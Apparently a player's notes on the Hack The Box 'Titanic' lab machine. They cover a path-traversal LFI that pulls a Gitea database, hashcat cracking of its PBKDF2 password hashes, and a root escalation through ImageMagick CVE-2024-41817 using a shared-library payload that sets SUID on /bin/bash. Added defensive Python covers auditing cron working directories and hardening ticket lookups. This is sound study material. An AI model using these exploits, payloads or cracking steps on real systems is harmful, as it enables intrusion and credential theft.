Here are my notes on the TITANIC box from Hack The Box.
10.129.124.239: TITANIC
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 73039c76eb04f1fec9e980449c7f1346 (ECDSA)
|_ 256 d5bd1d5e9a861ceb88634d5f884b7e04 (ED25519)
# Creds from the Gitea database hash cracking:
hashcat -m 10900 hashes.txt /usr/share/wordlists/rockyou.txt
sha256:50000:i/PjRSt4VE+L7pQA1pNtNA==:5THTmJRhN7rqcO1qaApUOF7P8TEwnAvY8iXyhEBrfLyO/F2+8wvxaCYZJjRE6llM+1Y=:25282528
developer:25282528
ssh developer@titanic.htb
developer@titanic:~$ whoami
developer
developer@titanic:~$ hostname
titanic
USER-SHELL !
developer@titanic:~$ ls
gitea mysql user.txt
developer@titanic:~$ cat user.txt
[REDACTED]
USER.TXT: [REDACTED]
PRIV ESC:
sudo -l: nothing
crontab: nothing
gcc is available
developer@titanic:/opt$ ls
app containerd scripts
developer@titanic:/opt$ ls -lah
total 20K
drwxr-xr-x 5 root root 4.0K Feb 7 10:37 .
drwxr-xr-x 19 root root 4.0K Feb 7 10:37 ..
drwxr-xr-x 5 root developer 4.0K Feb 7 10:37 app
drwx--x--x 4 root root 4.0K Feb 7 10:37 containerd
drwxr-xr-x 2 root root 4.0K Feb 7 10:37 scripts
developer@titanic:/opt$ cd scripts
developer@titanic:/opt/scripts$ ls
identify_images.sh
developer@titanic:/opt/scripts$ ls -lah
total 12K
drwxr-xr-x 2 root root 4.0K Feb 7 10:37 .
drwxr-xr-x 5 root root 4.0K Feb 7 10:37 ..
-rwxr-xr-x 1 root root 167 Feb 3 17:11 identify_images.sh
developer@titanic:/opt/scripts$ cat identify_images.sh
cd /opt/app/static/assets/images
truncate -s 0 metadata.log
find /opt/app/static/assets/images/ -type f -name "*.jpg" | xargs /usr/bin/magick identify >> metadata.log
identify_images.sh is a very interesting file.
ImageMagick CVE-2024-41817 PRIV ESC NOTES:
ImageMagick 7.1.1-35
It's vulnerable to Arbitrary Code Execution ! The AppImage build exports MAGICK_CONFIGURE_PATH and LD_LIBRARY_PATH with an empty path element, so a shared library (or config file) sitting in the current working directory gets loaded when magick runs (fixed in 7.1.1-36).
https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-8rxc-922v-phg8
developer@titanic:/tmp$ gcc -x c -shared -fPIC -o ./libxcb.so.1 - << EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
__attribute__((constructor)) void init(){
system("id");
exit(0);
}
EOF
developer@titanic:/tmp$ ls
c systemd-private-551971bda54d44a2928e727d6e46d529-ModemManager.service-DU1YVN
libxcb.so.1 systemd-private-551971bda54d44a2928e727d6e46d529-systemd-logind.service-4z3w9n
pspy64s systemd-private-551971bda54d44a2928e727d6e46d529-systemd-resolved.service-ykGqKx
snap-private-tmp systemd-private-551971bda54d44a2928e727d6e46d529-systemd-timesyncd.service-tfTkSo
ssh_client_ip_developer test.xml
systemd-private-551971bda54d44a2928e727d6e46d529-apache2.service-2E0WsI vmware-root_616-2689143977
developer@titanic:/tmp$ magick /dev/null /dev/null
uid=1000(developer) gid=1000(developer) groups=1000(developer)
The exploit works !
developer@titanic:/opt/app/static/assets/images$ cd /opt/app/static/assets/images
developer@titanic:/opt/app/static/assets/images$ gcc -x c -shared -fPIC -o ./libxcb.so.1 - << EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
__attribute__((constructor)) void init(){
system("chmod u+s /bin/bash");
exit(0);
}
EOF
developer@titanic:/opt/app/static/assets/images$ cp home.jpg home2.jpg
developer@titanic:/opt/app/static/assets/images$ ls -lah /bin/bash
-rwxr-xr-x 1 root root 1.4M Mar 14 2024 /bin/bash
developer@titanic:/opt/app/static/assets/images$ ls
entertainment.jpg exquisite-dining.jpg favicon.ico home2.jpg home.jpg libxcb.so.1 luxury-cabins.jpg metadata.log
developer@titanic:/opt/app/static/assets/images$ ls -lah /bin/bash
-rwsr-xr-x 1 root root 1.4M Mar 14 2024 /bin/bash
# Make sure libxcb.so.1 is dropped in /opt/app/static/assets/images: identify_images.sh cds into that directory before calling /usr/bin/magick, so that is the cwd the library gets loaded from when the root job runs.
developer@titanic:/opt/app/static/assets/images$ /bin/bash -p
bash-5.1# cd /root
bash-5.1# ls
cleanup.sh images revert.sh root.txt snap
bash-5.1# whoami
root
bash-5.1# hostname
titanic
bash-5.1# pwd
/root
bash-5.1# cat root.txt
[REDACTED]
ROOT-SHELL !
ROOT.TXT: [REDACTED]
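Defender-side check, added here (not part of the box or of ImageMagick): scan a cron script for `cd` targets that a non-root user can write into, which is exactly what made identify_images.sh dangerous (it cds into /opt/app/static/assets/images, writable by developer, before calling the AppImage magick). The scenario in demo() is constructed in a temp dir so it runs anywhere; the script text is modelled on identify_images.sh.

```python
import os
import re
import stat
import tempfile

# Matches "cd <dir>" lines in a shell script such as /opt/scripts/identify_images.sh.
CD_RE = re.compile(r"^\s*cd\s+(\S+)", re.MULTILINE)


def unsafe_cwd_reasons(path: str, trusted_uid: int = 0) -> list:
    """Why `path` is unsafe as the working directory of a privileged job: a non-root
    owner or a group/other write bit means another user can drop files (e.g. a .so) there."""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return ["does not exist"]
    reasons = []
    if st.st_uid != trusted_uid:
        reasons.append(f"owned by uid {st.st_uid}, not {trusted_uid}")
    if st.st_mode & stat.S_IWGRP:
        reasons.append("group-writable")
    if st.st_mode & stat.S_IWOTH:
        reasons.append("world-writable")
    return reasons


def audit_script(script_path: str, trusted_uid: int = 0) -> dict:
    """Return {cd_target: [reasons]} for every cd target in the script that is unsafe."""
    with open(script_path) as fh:
        text = fh.read()
    findings = {}
    for target in CD_RE.findall(text):
        reasons = unsafe_cwd_reasons(target, trusted_uid)
        if reasons:
            findings[target] = reasons
    return findings


def demo() -> tuple:
    """Constructed scenario: a copy of the cron script cd-ing into a directory the
    current user owns, first with 775 (group-writable, flagged) then 755 (clean)."""
    with tempfile.TemporaryDirectory() as tmp:
        images = os.path.join(tmp, "images")
        os.mkdir(images)
        script = os.path.join(tmp, "identify_images.sh")
        with open(script, "w") as fh:
            fh.write(f"cd {images}\ntruncate -s 0 metadata.log\n"
                     f"find {images}/ -type f -name '*.jpg' | xargs /usr/bin/magick identify >> metadata.log\n")
        me = os.getuid()                    # stand-in for root on the real host
        os.chmod(images, 0o775)
        flagged = audit_script(script, trusted_uid=me)
        os.chmod(images, 0o755)
        clean = audit_script(script, trusted_uid=me)
        return flagged, clean
```

Run it as root against /opt/scripts/*.sh to get the real verdict; anything flagged should be moved to a root-owned 755 directory before a privileged job cds into it.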
80/tcp open http Apache httpd 2.4.52
|_http-title: Did not follow redirect to http://titanic.htb/
|_http-server-header: Apache/2.4.52 (Ubuntu)
Titanic Booking System
Consider XXE ? - Maybe later.
NOPE, no XXE. However, if you submit a ticket with any name, you are redirected to GET /download?ticket=bc136ef7-3fe3-469b-8ec8-89ca7a1455a6.json
/download?ticket=../../../../../etc/passwd = WORKS !
LFI Vulnerability Discovered !
ffuf -u http://titanic.htb/download?ticket=FUZZ -w /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt
# No log poisoning via /var/log/apache2/access.log = DON'T BOTHER !
# No SSH id_rsa readable through the LFI
# I think you have to use the LFI to read the gitea data or something.
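Added example (not the flask-app's real code, which I did not copy here): the lookup the observed behaviour implies, next to a hardened version. The tickets directory name is an assumption; the ticket id format is the UUID.json the app hands out.

```python
import os
import posixpath
import re

# Assumption (not from the page): where the booking app keeps ticket files.
TICKETS_DIR = "/opt/app/tickets"

# Tickets look like "bc136ef7-3fe3-469b-8ec8-89ca7a1455a6.json": lowercase UUID + ".json".
TICKET_RE = re.compile(r"^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}\.json$")


def resolve_ticket_path_vulnerable(base_dir: str, ticket: str) -> str:
    """The behaviour seen above: the raw parameter is joined onto the directory, so
    enough "../" segments walk out of it (surplus ones are simply clamped at "/")."""
    return posixpath.normpath(posixpath.join(base_dir, ticket))


def is_valid_ticket(ticket: str) -> bool:
    """Allowlist: only a bare UUID.json name, so no slashes, no '..', no stray bytes."""
    return bool(ticket) and TICKET_RE.fullmatch(ticket) is not None


def resolve_ticket_path(base_dir: str, ticket: str) -> str:
    """Hardened lookup: allowlist the name, then confirm the resolved path still lies
    inside base_dir (defence in depth against symlinks or a later regex change)."""
    if not is_valid_ticket(ticket):
        raise ValueError("invalid ticket id")
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, ticket))
    if os.path.commonpath([base, target]) != base:
        raise ValueError("ticket path escapes the tickets directory")
    return target


def safe_lookup(base_dir: str, ticket: str):
    """Wrapper for a request handler: the path, or None when the request is rejected."""
    try:
        return resolve_ticket_path(base_dir, ticket)
    except ValueError:
        return None
```

The vulnerable function shows why five `../` work from a three-deep directory: normpath discards the extra parents at the root.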
LFI TO GITEA config and database files (Titanic-HTB):
# From the docker-compose.yml on dev.titanic.htb, the Gitea data directory on the host is:
/home/developer/gitea/data
Default gitea config file inside it:
/download?ticket=../../../../../home/developer/gitea/data/gitea/conf/app.ini:
[SNIP]
[database]
PATH = /data/gitea/gitea.db
DB_TYPE = sqlite3
HOST = localhost:3306
NAME = gitea
USER = root
PASSWD =
LOG_SQL = false
SCHEMA =
SSL_MODE = disable
[SNIP]
/download?ticket=../../../../../home/developer/gitea/data/gitea/gitea.db - WORKS and it's a sqlite3 file
wget http://titanic.htb//download?ticket=../../../../../home/developer/gitea/data/gitea/gitea.db -O gitea.db
sqlite3 gitea.db
Gitea Database Password Cracking:
https://www.unix-ninja.com/p/cracking_giteas_pbkdf2_password_hashes
https://raw.githubusercontent.com/unix-ninja/hashcat/refs/heads/master/tools/gitea2hashcat.py
sqlite> select * from user;
1|administrator|administrator||root@titanic.htb|0|enabled|cba20ccf927d3ad0567b68161732d3fbca098ce886bbc923b4062a3960d459c08d2dfc063b2406ac9207c980c47c5d017136|pbkdf2$50000$50|0|0|0||0|||70a5bd0c1a5d23caa49030172cdcabdc|2d149e5fbd1b20cf31db3e3c6a28fc9b|en-US||1722595379|1722597477|1722597477|0|-1|1|1|0|0|0|1|0|2e1e70639ac6b0eecbdab4a3d19e0f44|root@titanic.htb|0|0|0|0|0|0|0|0|0||gitea-auto|0
2|developer|developer||developer@titanic.htb|0|enabled|e531d398946137baea70ed6a680a54385ecff131309c0bd8f225f284406b7cbc8efc5dbef30bf1682619263444ea594cfb56|pbkdf2$50000$50|0|0|0||0|||0ce6f07fc9b557bc070fa7bef76a0d15|8bf3e3452b78544f8bee9400d6936d34|en-US||1722595646|1722603397|1722603397|0|-1|1|0|0|0|0|1|0|e2d95b7e207e432f62f3508be406c11b|developer@titanic.htb|0|0|0|0|2|0|0|0|0||gitea-auto|0
3|qwop|qwop||qwop@qwop.com|0|enabled|77b5fd3015cb3c747484008bf266b2d02f833cb44d731610a233d460f56d1d38c41927088f4ef5d33ad90c52f24e7bf32820|pbkdf2$50000$50|0|0|0||0|||e74aff81f8b579140975f1768374696b|9a0e0081727ab333a1980e58f9b0fa78|en-US||1740681234|1740683709|1740681234|0|-1|1|0|0|0|0|1|0|957575b617558e930da07bae87bb82fc|qwop@qwop.com|0|0|0|0|0|0|0|0|0|unified|gitea-auto|0
sqlite> select email,salt,passwd,passwd_hash_algo from user;
root@titanic.htb|2d149e5fbd1b20cf31db3e3c6a28fc9b|cba20ccf927d3ad0567b68161732d3fbca098ce886bbc923b4062a3960d459c08d2dfc063b2406ac9207c980c47c5d017136|pbkdf2$50000$50
developer@titanic.htb|8bf3e3452b78544f8bee9400d6936d34|e531d398946137baea70ed6a680a54385ecff131309c0bd8f225f284406b7cbc8efc5dbef30bf1682619263444ea594cfb56|pbkdf2$50000$50
qwop@qwop.com|9a0e0081727ab333a1980e58f9b0fa78|77b5fd3015cb3c747484008bf266b2d02f833cb44d731610a233d460f56d1d38c41927088f4ef5d33ad90c52f24e7bf32820|pbkdf2$50000$50
sqlite3 gitea.db 'select salt,passwd from user;' | python3 gitea2hashcat.py
[+] Run the output hashes through hashcat mode 10900 (PBKDF2-HMAC-SHA256)
sha256:50000:LRSeX70bIM8x2z48aij8mw==:y6IMz5J9OtBWe2gWFzLT+8oJjOiGu8kjtAYqOWDUWcCNLfwGOyQGrJIHyYDEfF0BcTY=
sha256:50000:i/PjRSt4VE+L7pQA1pNtNA==:5THTmJRhN7rqcO1qaApUOF7P8TEwnAvY8iXyhEBrfLyO/F2+8wvxaCYZJjRE6llM+1Y=
sha256:50000:mg4AgXJ6szOhmA5Y+bD6eA==:d7X9MBXLPHR0hACL8may0C+DPLRNcxYQojPUYPVtHTjEGScIj0710zrZDFLyTnvzKCA=
sqlite3 gitea.db 'select salt,passwd from user;' | python3 gitea2hashcat.py > hashes.txt
┌──(root㉿kali)-[/home/kali/BOXES/TITANIC]
└─# sqlite3 gitea.db 'select email,salt,passwd,passwd_hash_algo from user;'
root@titanic.htb|2d149e5fbd1b20cf31db3e3c6a28fc9b|cba20ccf927d3ad0567b68161732d3fbca098ce886bbc923b4062a3960d459c08d2dfc063b2406ac9207c980c47c5d017136|pbkdf2$50000$50
developer@titanic.htb|8bf3e3452b78544f8bee9400d6936d34|e531d398946137baea70ed6a680a54385ecff131309c0bd8f225f284406b7cbc8efc5dbef30bf1682619263444ea594cfb56|pbkdf2$50000$50
qwop@qwop.com|9a0e0081727ab333a1980e58f9b0fa78|77b5fd3015cb3c747484008bf266b2d02f833cb44d731610a233d460f56d1d38c41927088f4ef5d33ad90c52f24e7bf32820|pbkdf2$50000$50
┌──(root㉿kali)-[/home/kali/BOXES/TITANIC]
└─# python3 gitea2hashcat.py "8bf3e3452b78544f8bee9400d6936d34|e531d398946137baea70ed6a680a54385ecff131309c0bd8f225f284406b7cbc8efc5dbef30bf1682619263444ea594cfb56"
[+] Run the output hashes through hashcat mode 10900 (PBKDF2-HMAC-SHA256)
sha256:50000:i/PjRSt4VE+L7pQA1pNtNA==:5THTmJRhN7rqcO1qaApUOF7P8TEwnAvY8iXyhEBrfLyO/F2+8wvxaCYZJjRE6llM+1Y=
┌──(root㉿kali)-[/home/kali/BOXES/TITANIC]
└─# python3 gitea2hashcat.py "8bf3e3452b78544f8bee9400d6936d34|e531d398946137baea70ed6a680a54385ecff131309c0bd8f225f284406b7cbc8efc5dbef30bf1682619263444ea594cfb56" > hashes.txt
hashcat -m 10900 hashes.txt /usr/share/seclists/Passwords/darkweb2017-top10000.txt
hashcat -m 10900 hashes.txt /usr/share/wordlists/rockyou.txt
sha256:50000:i/PjRSt4VE+L7pQA1pNtNA==:5THTmJRhN7rqcO1qaApUOF7P8TEwnAvY8iXyhEBrfLyO/F2+8wvxaCYZJjRE6llM+1Y=:25282528
developer:25282528
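Added example (my own code, not gitea2hashcat.py's): the same hex-to-base64 rewrite that script performs for hashcat mode 10900, plus the check Gitea itself does at login, so a recovered password can be confirmed offline against the row. The constants are the developer row from the gitea.db dump above.

```python
import base64
import hashlib
import hmac

# developer row from the gitea.db user table (salt and passwd are hex-encoded in Gitea;
# passwd_hash_algo "pbkdf2$50000$50" = PBKDF2, 50000 rounds, 50-byte output).
DEVELOPER_SALT_HEX = "8bf3e3452b78544f8bee9400d6936d34"
DEVELOPER_PASSWD_HEX = "e531d398946137baea70ed6a680a54385ecff131309c0bd8f225f284406b7cbc8efc5dbef30bf1682619263444ea594cfb56"
DEVELOPER_ALGO = "pbkdf2$50000$50"


def parse_algo(algo: str) -> tuple:
    """'pbkdf2$50000$50' -> (50000, 50). Gitea's PBKDF2 variant is HMAC-SHA256."""
    name, iterations, keylen = algo.split("$")
    if name != "pbkdf2":
        raise ValueError(f"unsupported passwd_hash_algo: {name}")
    return int(iterations), int(keylen)


def to_hashcat_10900(salt_hex: str, passwd_hex: str, algo: str = DEVELOPER_ALGO) -> str:
    """hashcat -m 10900 layout: sha256:<iterations>:<b64 raw salt>:<b64 raw hash>.
    Note the salt is hex-decoded first; the raw 16 bytes are what PBKDF2 consumed."""
    iterations, _ = parse_algo(algo)
    salt_b64 = base64.b64encode(bytes.fromhex(salt_hex)).decode()
    hash_b64 = base64.b64encode(bytes.fromhex(passwd_hex)).decode()
    return f"sha256:{iterations}:{salt_b64}:{hash_b64}"


def verify_gitea_password(candidate: str, salt_hex: str, passwd_hex: str,
                          algo: str = DEVELOPER_ALGO) -> bool:
    """Recompute PBKDF2-HMAC-SHA256 over the hex-decoded salt and compare in constant time."""
    iterations, keylen = parse_algo(algo)
    derived = hashlib.pbkdf2_hmac("sha256", candidate.encode(), bytes.fromhex(salt_hex),
                                  iterations, dklen=keylen)
    return hmac.compare_digest(derived, bytes.fromhex(passwd_hex))
```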
ffuf -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u http://titanic.htb/ -H "Host: FUZZ.titanic.htb"
ffuf -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u http://titanic.htb/ -H "Host: FUZZ.titanic.htb" --fc 301
[SNIP]
dev [Status: 200, Size: 13982, Words: 1107, Lines: 276, Duration: 214ms]
[SNIP]
dev.titanic.htb = Gitea !
dev.titanic.htb:
Create an account to browse the public repositories as usual.
Found Developer / flask-app, which is the source code of the main titanic.htb site (the Titanic booking system).
Gitea version 1.22.1
Will check out Gitea for more later on.
Found Developer / docker-config:
docker-config/gitea/docker-compose.yml:
version: '3'
services:
  gitea:
    image: gitea/gitea
    container_name: gitea
    ports:
      - "127.0.0.1:3000:3000"
      - "127.0.0.1:2222:22" # Optional for SSH access
    volumes:
      - /home/developer/gitea/data:/data # Replace with your path
    environment:
      - USER_UID=1000
      - USER_GID=1000
    restart: always
/home/developer/gitea/data - very interesting path: it is bind-mounted as /data inside the container, so the PATH = /data/gitea/gitea.db from app.ini lives at /home/developer/gitea/data/gitea/gitea.db on the host, reachable through the LFI.
Service Info: Host: titanic.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel